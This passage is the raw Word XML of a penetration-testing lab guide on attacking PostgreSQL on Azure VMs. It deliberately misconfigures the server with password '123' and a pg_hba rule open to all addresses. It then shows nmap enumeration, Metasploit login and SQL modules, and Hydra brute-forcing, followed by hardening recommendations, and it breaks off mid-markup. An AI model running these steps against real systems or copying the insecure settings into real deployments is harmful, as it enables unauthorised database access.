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1715" w14:textId="77777777" w:rsidR="003F4257" w:rsidRDefault="003F4257" w:rsidP="003F4257">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="227A7884" w14:textId="77777777" w:rsidR="003F4257" w:rsidRPr="00B51945" w:rsidRDefault="003F4257" w:rsidP="003F4257">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Part 2: Attacking PostgreSQL on Azure VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6E2B68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 xml:space="preserve">This guide simulates a misconfigured database deployment inside </w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Azure Virtual Machines (VMs)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, commonly exposed due to poor configuration or default settings. We'll explore vulnerabilities in </w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>, using tools like nmap, Metasploit, and curl to demonstrate enumeration, brute-force, and remote exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50840B3F" w14:textId="77777777" w:rsidR="003F4257" w:rsidRDefault="003F4257" w:rsidP="003F4257">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74B06140" w14:textId="77777777" w:rsidR="003F4257" w:rsidRDefault="003F4257" w:rsidP="003F4257">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D8FCDA3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🎯</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Goal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D0A396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Misconfigure PostgreSQL for external access, identify default or weak credentials, and interact with the database to extract or modify data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F205BE6" w14:textId="77777777" w:rsidR="003F4257" w:rsidRDefault="003F4257" w:rsidP="003F4257">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77727F6A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☁️</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Scenario Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8EEA48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✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Azure Environment (Common for PostgreSQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBED832" w14:textId="77777777" w:rsidR="003F4257" w:rsidRPr="00B51945" w:rsidRDefault="003F4257" w:rsidP="003F4257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Target VMs</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7378E2BB" w14:textId="77777777" w:rsidR="003F4257" w:rsidRPr="00B51945" w:rsidRDefault="003F4257" w:rsidP="003F4257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>OS: Ubuntu 20.04 LTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9F27B3" w14:textId="77777777" w:rsidR="003F4257" w:rsidRPr="00B51945" w:rsidRDefault="003F4257" w:rsidP="003F4257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>NSG Rules:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C30354" w14:textId="77777777" w:rsidR="003F4257" w:rsidRPr="00B51945" w:rsidRDefault="003F4257" w:rsidP="003F4257">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL: Port </w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>5432</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> open (configured manually)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F636663" w14:textId="77777777" w:rsidR="003F4257" w:rsidRPr="00B51945" w:rsidRDefault="003F4257" w:rsidP="003F4257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Attacker VM</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135BB8A3" w14:textId="77777777" w:rsidR="003F4257" w:rsidRPr="00B51945" w:rsidRDefault="003F4257" w:rsidP="003F4257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>OS: Kali Linux (or Parrot OS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C7026E" w14:textId="77777777" w:rsidR="003F4257" w:rsidRPr="00B51945" w:rsidRDefault="003F4257" w:rsidP="003F4257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>Tools: nmap, msfconsole, curl, hydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB51F29" w14:textId="77777777" w:rsidR="003F4257" w:rsidRDefault="003F4257" w:rsidP="003F4257">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="187942A3" w14:textId="77777777" w:rsidR="003F4257" w:rsidRDefault="003F4257" w:rsidP="003F4257">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EFE196A" w14:textId="77777777" w:rsidR="003F4257" w:rsidRPr="00B51945" w:rsidRDefault="003F4257" w:rsidP="003F4257">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7521EC2B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b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Step 1: PostgreSQL Setup on Ubuntu (on Azure)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316E26C8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sudo apt install postgresql postgresql-client -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D2958E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sudo systemctl start postgresql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC04CB1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sudo systemctl enable postgresql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424AEF8D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🔑</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 2: Set PostgreSQL Passwords &amp; Create Users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD4D87A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sudo su - postgres</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33819B82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psql -c "ALTER USER postgres WITH PASSWORD '123';"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E37A63E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createuser -EPd ignite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F14E1A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createdb secret -O ignite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4DEA0D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ignite is now a database user with a database named secret.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B18CDCF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755F39A6">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="019C7D48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🌐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 3: Enable Remote Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7EE907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Edit config file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBEA262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sudo nano /etc/postgresql/12/main/postgresql.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7268841B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Set:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA0FF6A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listen_addresses = '*'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717345DE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Then edit pg_hba.conf:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4C56F9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sudo nano /etc/postgresql/12/main/pg_hba.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B17C15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Add:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F1DB38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host    all             all             0.0.0.0/0               md5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29739F8E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Restart PostgreSQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BCDB82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sudo service postgresql restart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3DEAAA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61339B80">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="55602677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📡</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 4: Nmap Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B09199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nmap -p5432 --script=pgsql-brute,pgsql-databases,pgsql-version &lt;target-ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CE89C6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Use NSE scripts to discover:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6288600C" w14:textId="77777777" w:rsidR="003F4257" w:rsidRPr="00B51945" w:rsidRDefault="003F4257" w:rsidP="003F4257">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D99483" w14:textId="77777777" w:rsidR="003F4257" w:rsidRPr="00B51945" w:rsidRDefault="003F4257" w:rsidP="003F4257">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>DB versions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A232B7F" w14:textId="77777777" w:rsidR="003F4257" w:rsidRPr="00B51945" w:rsidRDefault="003F4257" w:rsidP="003F4257">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Accessible DBs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42489309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lastRenderedPageBreak/>
        <w:pict w14:anchorId="13E163A1">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="753D8952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💣</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 5: Brute-Force Credentials with Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CA12D0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msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6740917F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use auxiliary/scanner/postgres/postgres_login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331AB078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RHOSTS &lt;target-ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F0C4B0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USERNAME postgres</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB6464A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PASSWORD 123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B3611E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run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A1ACBD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If successful, use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406CBDA1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use auxiliary/admin/postgres/postgres_sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B3A3B4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SQL 'SELECT * FROM pg_user;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549BFE8A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48B7E111">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F80DF47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🔚</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Final Notes &amp; Azure Considerations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51"/>
        <w:gridCol w:w="2788"/>
        <w:gridCol w:w="4768"/>
      </w:tblGrid>
      <w:tr w:rsidR="003F4257" w:rsidRPr="00B51945" w14:paraId="0EAE301E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29D42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557A733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EB6082C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Key Exploits</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0864661E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Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F4257" w:rsidRPr="00B51945" w14:paraId="2E88370E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B09C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CouchDB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="701C35F9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5984</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="054F817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couchdb_login, cmd_exec</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5626EE13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Enable bind_address to localhost only (127.0.0.1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F4257" w:rsidRPr="00B51945" w14:paraId="62C52008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D9FF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71BD12C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11344E0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postgres_login, postgres_sql</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EA2B34C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Restrict pg_hba.conf to internal IPs only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3F6AC04D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🛡️</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Azure Security Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D602B4D" w14:textId="77777777" w:rsidR="003F4257" w:rsidRPr="00B51945" w:rsidRDefault="003F4257" w:rsidP="003F4257">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>NSG Rules</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>: Never expose database ports (5984, 5432) publicly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6A274D" w14:textId="77777777" w:rsidR="003F4257" w:rsidRPr="00B51945" w:rsidRDefault="003F4257" w:rsidP="003F4257">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Private Link</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>: Use Azure Private Endpoint for DBs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C729868" w14:textId="77777777" w:rsidR="003F4257" w:rsidRPr="00B51945" w:rsidRDefault="003F4257" w:rsidP="003F4257">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Logging</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: Enable </w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Azure Monitor</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Diagnostic Settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734D82C1" w14:textId="77777777" w:rsidR="003F4257" w:rsidRPr="00B51945" w:rsidRDefault="003F4257" w:rsidP="003F4257">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Alerts</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>: Create alerts for unusual login activity or port scans</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9E100F" w14:textId="77777777" w:rsidR="003F4257" w:rsidRPr="00B51945" w:rsidRDefault="003F4257" w:rsidP="003F4257">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DDB09A8" w14:textId="77777777" w:rsidR="003F4257" w:rsidRPr="00B51945" w:rsidRDefault="003F4257" w:rsidP="003F4257">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Compromising PostgreSQL (Port 5432)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070E55C4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 xml:space="preserve">This guide outlines how to discover and exploit </w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>PostgreSQL databases</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> deployed on Azure, using tools like Nmap, Hydra, psql, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to perform real-world credential attacks, file reading, command execution, and session hijacking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFCEAB0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51423140">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C43B67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⚙️</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Lab Setup (Azure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103"/>
      </w:tblGrid>
      <w:tr w:rsidR="003F4257" w:rsidRPr="00B51945" w14:paraId="713D4D78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7B39D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2255AA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Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F4257" w:rsidRPr="00B51945" w14:paraId="2A8F8DA6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F851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Target VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D3021D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Ubuntu 20.04 with PostgreSQL 12+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F4257" w:rsidRPr="00B51945" w14:paraId="61315D34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F0E5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9DB67FF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Public or Internal IP of VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F4257" w:rsidRPr="00B51945" w14:paraId="2DBB6311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7D3E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NSG Rules</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28BE75D6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Port 5432 exposed (externally or internally)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F4257" w:rsidRPr="00B51945" w14:paraId="7F9DF8C1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523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Attacker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="546346BF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Kali Linux VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6A5D0F7A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7368498D">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F27B5D5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b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Step 1: Port Scanning and Service Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01775F2F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 xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to identify if PostgreSQL is exposed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8B4765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nmap -p5432 -sV &lt;target-ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093EC5D0" w14:textId="77777777" w:rsidR="003F4257" w:rsidRPr="00B51945" w:rsidRDefault="003F4257" w:rsidP="003F4257">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Expected Output</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48376C84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5432/tcp open  postgresql PostgreSQL DB &lt;version&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114AE763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If the port is open, move on to credential discovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019B75DE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02DA963F">
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="44058244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🔐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 2: Brute-Force Login Credentials (Hydra)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22634286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 xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Hydra</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to try common or leaked PostgreSQL credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FBC91F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hydra -L users.txt -P passwords.txt &lt;target-ip&gt; postgres</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5F9E2D" w14:textId="77777777" w:rsidR="003F4257" w:rsidRPr="00B51945" w:rsidRDefault="003F4257" w:rsidP="003F4257">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>-L specifies the username wordlist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2143FE1D" w14:textId="77777777" w:rsidR="003F4257" w:rsidRPr="00B51945" w:rsidRDefault="003F4257" w:rsidP="003F4257">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51945">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>-P specifies the password wordlist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4878693D" w14:textId="77777777" w:rsidR="003F4257" w:rsidRPr="00B51945" w:rsidRDefault="003F4257" w:rsidP="003F4257">
      <w:pPr>
        <w:rPr>
